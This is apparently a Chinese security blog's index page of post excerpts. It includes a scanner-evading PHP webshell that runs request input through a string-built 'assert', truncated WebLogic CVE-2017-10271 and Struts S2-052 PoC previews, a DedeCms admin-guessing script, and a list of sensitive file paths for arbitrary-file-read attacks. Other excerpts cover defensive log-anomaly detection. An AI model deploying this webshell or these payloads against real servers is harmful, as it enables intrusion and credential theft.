Php Webshell ByPass SafeDog

记录一些php webshell代码 最新版安全狗扫描结果: 下面是代码,代码顺序为图中顺序: <?php $arr = array('a','s','s','e','r','t'); $func = ''; for($i=0;$i<count($arr);$i++) { $func .= $func . $arr[$i]; } $func($_REQUEST['c']); ?> <?php    @$_++;  $__=("#...

阅读全文>>

大数据技能点

                路漫漫其修远兮,吾将上下而求索             一、大数据通用处理平台         1、Spark      ...

阅读全文>>

Weblogic WLS组件漏洞POC

漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 http://0.0.0.0:7071/wls-wsat/CoordinatorPortType <soapenv:Envelope xmlns:soapenv="http://schemas.xmls...

阅读全文>>

DedeCms后台猜解

网上流传的一个找后台的姿势,记录一下: <?php $domain='http://localhost/dedecms/'; $url=$domain.'/index.php'; function post($url, $data, $cookie = '') { $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => true, CURLOPT_POST => true, CURLOPT_SSL_V...

阅读全文>>

任意文件读取常见利用路径

C:/boot.ini //查看系统版本 C:/WindowsSystem32inetsrvMetaBase.xml //IIS配置文件 C:/Windowsrepairsam //存储系统初次安装的密码 C:/Program Filesmysqlmy.ini //Mysql配置 C:/Program Filesmysqldatamysqluser.MYD //Mysql root C:/Windowsphp.ini //php配置信息 C:/Windowsmy.ini //Mysql配置信息C:Windowswin.ini //Windows系统的一个基本系统配置文件 Li...

阅读全文>>

使用K-means对网站访问者进行聚类

在分析Web日志流程中,寻找可疑请求、寻找异常访问者为分析流程中的基础流程,传统的做法是使用正则进行筛选,而这些正则则是通过我们已知的安全经验编写出来的,此时我们可以通过尝试一些新的方法~ 一、数据准备 同上篇 二、算法测试 依赖库地址:[K-Means Java实现](https://sourceforge.net/p/yuanboshekmeans/code/ref/master/) 我们下载kmeans库之后将其引用到项目中,并编写测试Demo,测试库的可用性。测试Demo如图:  可以看到我们使用了4个3维的样本数据,数据...

阅读全文>>

使用LOF(Local Outlier Factor)异常检测算法检测异常访问者

 在日常日志分析中,我们通常使用自己的“安全经验”编写出关于攻击的一些规则去寻找日志中攻击行为,从而得到一段时间内的异常访问者IP,即所有“命中过规则”的访问者,而面对千变万化的Web应用、不断更新迭代的技术以及攻击者变幻莫测的攻击手法,难免我们有时无法紧随攻击者的步伐,如果某一个攻击者发起过攻击但是所使用的攻击手法不在我们所已知的安全经验范围内,此时这个恶意的访问者便会从我们的关注范围溜走。      此时我们可以另辟蹊径,忘掉那些已知的安全规则,尝试使用不同的方法在日志中找到异常访问者。此时我们可以使用异常检测算法中的LOF算法(Loca...

阅读全文>>

Struts 052 - REST插件远程代码执行[Poc]

漏洞影响 Struts 2.5 – Struts 2.5.12 版本, 漏洞概述 Struts2 REST插件使用带有XStream程序的XStream Handler进行未经任何代码过滤的反序列化操作,这可能在反序列化XML payloads时导致远程代码执行。任意攻击者都可以构造恶意的XML内容提升权限。 其实我觉得此次漏洞并非Struts的主要责任,问题出在XStream组件上 XStream介绍: XStream是一个Java对象和XML相互转换的工具。提供了所有的基础类型、数组、集合等类型直接转...

阅读全文>>

Web安全日志分析浅谈


阅读全文>>

在线子域名、C段、同IP服务器查询[2016.5.9更新]

自从用习惯shodan、zoomeye等成熟的产品,意识到了数据的价值和重要性,于是开始尝试自己折腾,搭建数据检索系统,此域名查询系统为学习项目,仅为Demo版本,开放测试版本,不断完善中。 上图: 说明: 0.数据来源于园长的1.5E域名 1.此项目目的为学习ES,所以并不成熟 2.服务器资源有限,大家轻碰(坏了赔钱- -) 3.有时间会持续添加功能,在线实时跑任务、更新数据、其他解析记录等等等 4.支持的语法有ip、domain、cip,默认无语法则模糊搜索...

阅读全文>>